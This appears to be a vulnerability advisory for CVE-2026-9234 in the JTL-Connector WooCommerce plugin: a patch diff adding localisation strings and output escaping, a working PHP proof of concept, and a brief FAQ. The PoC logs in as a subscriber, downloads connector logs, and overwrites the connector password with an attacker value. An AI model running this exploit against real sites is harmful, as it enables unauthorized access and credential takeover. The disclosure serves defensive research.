@@ -1066,7 +1072,7 @@
         //Add extend plugin informations
         if (count(SupportedPlugins::getSupported()) > 0) {
             $fields[] = [
-                'title'   => __('These activated plugins extend the JTL-Connector:', JTLWCC_TEXT_DOMAIN),
+                'title'   => __('These activated plugins extend the JTL-Connector:', 'woo-jtl-connector'),
                 'type'    => 'compatible_plugins_field',
                 'plugins' => SupportedPlugins::getSupported(),
             ];
@@ -1074,13 +1080,13 @@

         //Add Incompatible plugin informations
         $fields[] = [
-            'title'   => __('Incompatible with these plugins:', JTLWCC_TEXT_DOMAIN),
+            'title'   => __('Incompatible with these plugins:', 'woo-jtl-connector'),
             'type'    => 'not_compatible_plugins_field',
             'plugins' => SupportedPlugins::getNotSupportedButActive(false, true, true),
         ];

         $fields[] = [
-            'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+            'title'      => __('Important information', 'woo-jtl-connector'),
             'type'       => 'jtlwcc_card',
             'color'      => 'border-warning',
             'text-color' => 'text-warning',
@@ -1088,7 +1094,7 @@
             'text'       => __(
                 'Similar plugins, like the <b>not compatible plugins</b> which
                     are listed here, might be incompatible too!',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1112,7 +1118,9 @@
             if (is_string($notSupportedButActiveAsString)) {
                 self::jtlwcc_show_wordpress_error(
                     sprintf(
-                        __('The listed plugins can cause problems when using the connector: %s', JTLWCC_TEXT_DOMAIN),
+                        // translators: %s: list of unsupported plugin names
+
+                        __('The listed plugins can cause problems when using the connector: %s', 'woo-jtl-connector'),
                         $notSupportedButActiveAsString
                     )
                 );
@@ -1128,7 +1136,8 @@
     public static function jtlwcc_show_wordpress_error(string $message): void //phpcs:ignore
     {
         echo '<div class="alert alert-danger" id="jtlwcc_plugin_error" role="alert">
-                    <p><b>JTL-Connector:</b> ' . $message . '</p>
+                    <p><b>JTL-Connector:</b> '
+                    . wp_kses_post($message) . '</p>
                 </div>';
     }

@@ -1148,7 +1157,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop
                 with the free JTL-Wawi ERP system by JTL-Software. These are the advanced settings of the
                 installed JTL-Connector. Here you can configure how some data is handled while push/pull.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1159,73 +1168,73 @@

         //Add variation specific radio field
         $fields[] = [
-            'title'     => __('Variation specifics', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Variation specifics', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to show your customers the variation as specific (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_SHOW_VARIATION_SPECIFICS_ON_PRODUCT_PAGE,
             'value'     => Config::get(Config::OPTIONS_SHOW_VARIATION_SPECIFICS_ON_PRODUCT_PAGE),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         $fields[] = [
-            'title'     => __('Delete unknown attributes', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Delete unknown attributes', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to delete unknown attributes on push (Default : Disabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DELETE_UNKNOWN_ATTRIBUTES,
             'value'     => Config::get(Config::OPTIONS_DELETE_UNKNOWN_ATTRIBUTES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add custom properties radio field
         $fields[] = [
-            'title'     => __('Custom properties', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Custom properties', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'If you activate this option, custom fields from JTL-Wawi will be handled
                 as attributes in the shop. After changing this option, full-sync is required (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_SEND_CUSTOM_PROPERTIES,
             'value'     => Config::get(Config::OPTIONS_SEND_CUSTOM_PROPERTIES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add gtin/ean radio field
         $fields[] = [
-            'title'     => __('GTIN / EAN', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('GTIN / EAN', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to use the GTIN field for ean.
                 (Default : Enabled / Required plugin: WooCommerce Germanized).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_USE_GTIN_FOR_EAN,
             'value'     => Config::get(Config::OPTIONS_USE_GTIN_FOR_EAN),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Allow html in attributes
         $fields[] = [
-            'title'     => __('Allow HTML in product attributes', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Allow HTML in product attributes', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to allow saving HTML in product attributes (Default : Disabled)',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_ALLOW_HTML_IN_PRODUCT_ATTRIBUTES,
             'value'     => Config::get(Config::OPTIONS_ALLOW_HTML_IN_PRODUCT_ATTRIBUTES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add sectionend
@@ -1253,7 +1262,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop
                 with the free JTL-Wawi ERP system by JTL-Software. Delivery time related settings of the
                 installed JTL-Connector. Here you can set some options to modify the pull/psuh of delivery times.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1264,14 +1273,14 @@

         //Add delivery time calculation radio field
         $fields[] = [
-            'title'     => __('DeliveryTime Calculation', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('DeliveryTime Calculation', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_select',
             'id'        => Config::OPTIONS_USE_DELIVERYTIME_CALC,
             'value'     => Config::get(Config::OPTIONS_USE_DELIVERYTIME_CALC),
             'options'   => [
-                'delivery_time_calc' => __('Lieferzeit Berechnung nutzen', JTLWCC_TEXT_DOMAIN),
-                'delivery_status'    => __('Lieferstatus nutzen', JTLWCC_TEXT_DOMAIN),
-                'deactivated'        => __('Deaktiviert', JTLWCC_TEXT_DOMAIN),
+                'delivery_time_calc' => __('Lieferzeit Berechnung nutzen', 'woo-jtl-connector'),
+                'delivery_status'    => __('Lieferstatus nutzen', 'woo-jtl-connector'),
+                'deactivated'        => __('Deaktiviert', 'woo-jtl-connector'),
             ],
             'helpBlock' => __(
                 "Enable if you want to use delivery time calculation. <br>
@@ -1279,55 +1288,55 @@
                         Delivery status: Use the delivery status as delivery time. <br>
                         Deactivated: Don't use delivery time. <br>
                         (Default : Delivery time calculation / Required plugin: WooCommerce Germanized).",
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //Add dont use zero values radio field
         $fields[] = [
-            'title'     => __('Dont use zero values for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Dont use zero values for delivery time', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you dont want to use zero values for delivery time. (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DISABLED_ZERO_DELIVERY_TIME,
             'value'     => Config::get(Config::OPTIONS_DISABLED_ZERO_DELIVERY_TIME),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add prefix for delivery time textinput field
         $fields[] = [
-            'title'     => __('Prefix for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Prefix for delivery time', 'woo-jtl-connector'),
             'type'      => 'jtl_text_input',
             'id'        => Config::OPTIONS_PRAEFIX_DELIVERYTIME,
             'value'     => Config::get(Config::OPTIONS_PRAEFIX_DELIVERYTIME),
-            'helpBlock' => __("Define the prefix like" . PHP_EOL . "'ca. 4 Days'.", JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __("Define the prefix liken'ca. 4 Days'.", 'woo-jtl-connector'),
         ];

         //Add suffix for delivery time textinput field
         $fields[] = [
-            'title'     => __('Suffix for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Suffix for delivery time', 'woo-jtl-connector'),
             'type'      => 'jtl_text_input',
             'id'        => Config::OPTIONS_SUFFIX_DELIVERYTIME,
             'value'     => Config::get(Config::OPTIONS_SUFFIX_DELIVERYTIME),
-            'helpBlock' => __("Define the Suffix like" . PHP_EOL . "'ca. 4 work days'.", JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __("Define the Suffix liken'ca. 4 work days'.", 'woo-jtl-connector'),
         ];

         //Use next available inflow date if needed
         $fields[] = [
-            'title'     => __('Consider available inflow date for shipping', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Consider available inflow date for shipping', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want that connector calculate shipping time based on next a
                 vailable inflow date from supplier when stock is 0',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_CONSIDER_SUPPLIER_INFLOW_DATE,
             'value'     => Config::get(Config::OPTIONS_CONSIDER_SUPPLIER_INFLOW_DATE),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add sectionend
@@ -1354,7 +1363,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop with the
                 free JTL-Wawi ERP system by JTL-Software. Customer order related settings of the installed
                 JTL-Connector. Here you can set some options to modify the import of customer orders.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1367,27 +1376,27 @@

         //Add pull order since date field
         $fields[] = [
-            'title'     => __('Pull orders since', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Pull orders since', 'woo-jtl-connector'),
             'type'      => 'jtl_date_field',
             // 'default'  => '2019-03-22',
             'value'     => Config::get(Config::OPTIONS_PULL_ORDERS_SINCE),
-            'helpBlock' => __('Define a start date for pulling of orders.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('Define a start date for pulling of orders.', 'woo-jtl-connector'),
             'id'        => Config::OPTIONS_PULL_ORDERS_SINCE,
         ];
         $fields[] = [
-            'title'     => __('Recalculate order when has coupons', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Recalculate order when has coupons', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'When option is enabled, connector will recalculate order when coupons were applied to order.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_RECALCULATE_COUPONS_ON_PULL,
             'value'     => Config::get(Config::OPTIONS_RECALCULATE_COUPONS_ON_PULL),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];
         $fields[] = [
-            'title'     => __('Default order statuses to import', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Default order statuses to import', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_multiselect',
             'options'   => wc_get_order_statuses(),
             'id'        => Config::OPTIONS_DEFAULT_ORDER_STATUSES_TO_IMPORT,
@@ -1397,7 +1406,7 @@
             ),
             'helpBlock' => __(
                 'Order statuses that should be imported. Default: pending, processing, on hold, completed',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1411,7 +1420,7 @@
             'title'   => __(
                 'Import payments with following payment types only when order
                 is completed (usually manual payment types)',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'type'    => 'jtl_connector_multiselect',
             'options' => $paymentGateways,
@@ -1423,23 +1432,23 @@
         ];

         $fields[] = [
-            'title'     => __('Delay time in seconds before order import'),
+            'title'     => __('Delay time in seconds before order import', 'woo-jtl-connector'),
             'type'      => 'jtl_number_input',
             'value'     => Config::get(Config::OPTIONS_IGNORE_ORDERS_YOUNGER_THAN),
-            'helpBlock' => __('Define the delay time in seconds before new orders get imported.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('Define the delay time in seconds before new orders get imported.', 'woo-jtl-connector'),
             'id'        => Config::OPTIONS_IGNORE_ORDERS_YOUNGER_THAN,
         ];

         //Add custom checkout fields input field
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_CHECKOUT_FIELD_EDITOR_FOR_WOOCOMMERCE)) {
             $fields[] = [
-                'title'     => __('Custom Checkout Fields', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Custom Checkout Fields', 'woo-jtl-connector'),
                 'type'      => 'jtl_text_input',
                 'id'        => Config::OPTIONS_CUSTOM_CHECKOUT_FIELDS,
                 'value'     => Config::get(Config::OPTIONS_CUSTOM_CHECKOUT_FIELDS),
                 'helpBlock' => __(
                     "Define what custom fields should be imported to Wawi. Comma-separated.",
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];
         }
@@ -1466,10 +1475,7 @@

         $fields[] = [
             'type' => 'title',
-            'desc' => __(
-                '',
-                JTLWCC_TEXT_DOMAIN
-            ),
+            'desc' => '',
         ];


@@ -1478,7 +1484,7 @@
         ];

         $fields[] = [
-            'title'     => __('Limit Customer Pull', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Limit Customer Pull', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_select',
             'id'        => Config::OPTIONS_LIMIT_CUSTOMER_QUERY_TYPE,
             'value'     => Config::get(
@@ -1486,10 +1492,10 @@
                 Config::JTLWCC_CONFIG_DEFAULTS[ Config::OPTIONS_LIMIT_CUSTOMER_QUERY_TYPE ]
             ),
             'options'   => [
-                'no_filter'           => __('No Limit', JTLWCC_TEXT_DOMAIN),
-                'last_imported_order' => __('Since last pulled Order ID', JTLWCC_TEXT_DOMAIN),
-                'not_imported'        => __('Only from not pulled Order', JTLWCC_TEXT_DOMAIN),
-                'fixed_date'          => __('Since fixed Date', JTLWCC_TEXT_DOMAIN),
+                'no_filter'           => __('No Limit', 'woo-jtl-connector'),
+                'last_imported_order' => __('Since last pulled Order ID', 'woo-jtl-connector'),
+                'not_imported'        => __('Only from not pulled Order', 'woo-jtl-connector'),
+                'fixed_date'          => __('Since fixed Date', 'woo-jtl-connector'),
             ],
             'helpBlock' => __(
                 '"No Limit" will Pull all Users in the User Group "Customers" (with B2B Market, define Groups below),
@@ -1505,7 +1511,7 @@
                                 Timeout Errors in JTL-WAWI. <br><br>
                                 Speeds decreases linearly with the number of Customers and/or Orders
                                 except for "Only from not pulled Order" which decreases exponentially.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1531,7 +1537,7 @@
             }

             $fields[] = [
-                'title'     => __('Customer Groups to Pull (only with no Limit)', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Customer Groups to Pull (only with no Limit)', 'woo-jtl-connector'),
                 'type'      => 'jtl_connector_multiselect',
                 'options'   => $roles,
                 'id'        => Config::OPTIONS_PULL_CUSTOMER_GROUPS,
@@ -1539,7 +1545,7 @@
                 'helpBlock' => __(
                     'Pull Customers with this Customer Groups, only respected if no Limit is defined.
                     <br> Guests are always pulled. ',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];

@@ -1556,12 +1562,12 @@


             $fields[] = [
-                'title'     => __('B2B-Market/WooCommerce default customer group', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('B2B-Market/WooCommerce default customer group', 'woo-jtl-connector'),
                 'type'      => 'jtl_connector_select',
                 'id'        => Config::OPTIONS_DEFAULT_CUSTOMER_GROUP,
                 'value'     => Config::get(Config::OPTIONS_DEFAULT_CUSTOMER_GROUP),
                 'options'   => $options,
-                'helpBlock' => __('Define which customer group is default.', JTLWCC_TEXT_DOMAIN),
+                'helpBlock' => __('Define which customer group is default.', 'woo-jtl-connector'),
             ];
         }

@@ -1590,47 +1596,47 @@
                 with the free JTL-Wawi ERP system by JTL-Software. Developer related settings of
                 the installed JTL-Connector. Here you can enable/disable/reset/download the
                 developer logs of the jtl connector.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //Add dev log radio field
         $fields[] = [
-            'title'     => __('Dev-Logs', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Dev-Logs', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable JTL-Connector dev-logs for debugging (Default : Disabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DEVELOPER_LOGGING,
             'value'     => Config::get(Config::OPTIONS_DEVELOPER_LOGGING),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add dev log buttons
         $fields[] = [
             'type'          => 'dev_log_btn',
-            'downloadText'  => __('Download', JTLWCC_TEXT_DOMAIN),
-            'clearLogsText' => __('Clear logs', JTLWCC_TEXT_DOMAIN),
+            'downloadText'  => __('Download', 'woo-jtl-connector'),
+            'clearLogsText' => __('Clear logs', 'woo-jtl-connector'),
         ];

         $fields[] = [
-            'title'     => __('Recommend WooCommerce Settings', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Recommend WooCommerce Settings', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'JTL-Wawi set automatically stable settings (Default : Enabled).
                 Disable this at your own risk!',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_AUTO_WOOCOMMERCE_OPTIONS,
             'value'     => Config::get(Config::OPTIONS_AUTO_WOOCOMMERCE_OPTIONS),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];
         //phpcs:disable
         $fields[] = [
-            'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+            'title'      => __('Important information', 'woo-jtl-connector'),
             'type'       => 'jtlwcc_card',
             'color'      => 'border-info',
             'text-color' => 'text-danger',
@@ -1642,27 +1648,27 @@
                  <li class="list-group-item bg-transparent">Display prices in the shop: "Including tax" (Dont change this!)</li>
                  <li class="list-group-item bg-transparent">Display prices during cart and checkout: "Including tax" (Dont change this!)</li>
                  </ul>',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //phpcs:enable
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_GERMAN_MARKET)) {
             $fields[] = [
-                'title'     => __('Recommend German Market Settings', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Recommend German Market Settings', 'woo-jtl-connector'),
                 'type'      => 'active_true_false_radio',
                 'desc'      => __(
                     'JTL-Wawi set automatically stable settings (Default : Enabled). Disable this at your own risk!',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
                 'id'        => Config::OPTIONS_AUTO_GERMAN_MARKET_OPTIONS,
                 'value'     => Config::get(Config::OPTIONS_AUTO_GERMAN_MARKET_OPTIONS),
-                'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-                'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+                'trueText'  => __('Enabled', 'woo-jtl-connector'),
+                'falseText' => __('Disabled', 'woo-jtl-connector'),
             ];
             //phpcs:disable
             $fields[] = [
-                'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+                'title'      => __('Important information', 'woo-jtl-connector'),
                 'type'       => 'jtlwcc_card',
                 'color'      => 'border-info',
                 'text-color' => 'text-danger',
@@ -1697,7 +1703,7 @@
                     <li class="list-group-item bg-transparent">Global Options > Prorated Tax Calculation For Fees & Shipping Cost: "On" (Dont change this!)</li>
                     <li class="list-group-item bg-transparent">Global Options > Gross Shipping Costs and Gross Fees: "Off"</li>
                     </ul>',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];
             //phpcs:enable
@@ -1706,19 +1712,19 @@
         //CURRENT DISBALED THIS
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_B2B_MARKET)) {
             $fields[] = [
-                'title'     => __('Recommend B2B Market Settings', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Recommend B2B Market Settings', 'woo-jtl-connector'),
                 'type'      => 'active_true_false_radio',
                 'desc'      => __(
                     'JTL-Wawi set automatically stable settings (Default : Enabled). Disable this at your own risk!',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
                 'id'        => Config::OPTIONS_AUTO_B2B_MARKET_OPTIONS,
                 'value'     => Config::get(Config::OPTIONS_AUTO_B2B_MARKET_OPTIONS),
-                'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-                'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+                'trueText'  => __('Enabled', 'woo-jtl-connector'),
+                'falseText' => __('Disabled', 'woo-jtl-connector'),
             ];
 // $fields[] = [
-// 'title' => __('Important information', JTLWCC_TEXT_DOMAIN),
+// 'title' => __('Important information', 'woo-jtl-connector'),
 // 'type' => 'jtlwcc_card',
 // 'color' => 'border-info',
 // 'text-color' => 'text-info',
@@ -1759,35 +1765,35 @@
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-information"><?php print __(
                        'Information',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'advanced_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-advanced"><?php print __(
                        'Advanced Settings',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'delivery_time_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-delivery-time"><?php print __(
                        'Delivery times',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'customer_order_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-customer-order"><?php print __(
                        'Customer orders',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'customers_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-customers"><?php print __(
                        'Customers',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (
                     strcmp(
@@ -1798,13 +1804,13 @@
                    } ?>"
                    href="admin.php?page=woo-jtl-connector-developer-settings"><?php print __(
                        'Developer Settings',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link"
                    href="https://guide.jtl-software.de/jtl-connector/woocommerce/"
                    target="_blank"><?php print __(
                        'JTL-Guide',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>


@@ -1829,7 +1835,7 @@

         if (!is_string($installed_version)) {
             throw new InvalidArgumentException(
-                "Expected installed_version to be a string, got " . gettype($instal

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-9234 - JTL-Connector for WooCommerce <= 2.4.1 - Missing Authorization

$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'subscriber';            // Change to a valid subscriber username
$password = 'password';              // Change to the subscriber's password

// Step 1: Log in to get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);

// Step 2: Download JTL connector logs (AJAX handler - no nonce needed)
$ajax_log_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = [
    'action' => 'downloadJTLLogs'
];

curl_setopt($ch, CURLOPT_URL, $ajax_log_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$logs_response = curl_exec($ch);

if (strlen($logs_response) > 100) {
    echo "[+] Logs downloaded successfully!n";
    echo "[+] Logs size: " . strlen($logs_response) . " bytesn";
    file_put_contents('jtl_logs.zip', $logs_response);
    echo "[+] Logs saved to jtl_logs.zipn";
} else {
    echo "[!] No logs downloaded or endpoint not accessible.n";
    echo "[!] Response: " . $logs_response . "n";
}

// Step 3: Modify plugin settings (admin-post handler - no capability check)
$admin_post_url = $target_url . '/wp-admin/admin-post.php';
$settings_data = [
    'action' => 'settings_save_woo-jtl-connector',
    // Example: change connector password to attacker-controlled value
    'connector_password' => 'attacker_controlled_password'
];

curl_setopt($ch, CURLOPT_URL, $admin_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$settings_response = curl_exec($ch);

echo "[+] Settings modification attempted. Check if connector password changed.n";

curl_close($ch);
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-9234?
Description of the vulnerability
CVE-2026-9234 is a medium severity vulnerability in the JTL-Connector for WooCommerce plugin for WordPress, affecting versions up to and including 2.4.1. It is caused by missing authorization checks that allow authenticated users with Subscriber-level access and above to modify plugin settings and download sensitive log files.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing capability checks and nonce verification in several functions, specifically in admin_post_settings_save_woo-jtl-connector and AJAX actions for downloading and clearing logs. This allows attackers to send crafted requests to modify settings or access logs without proper authorization.
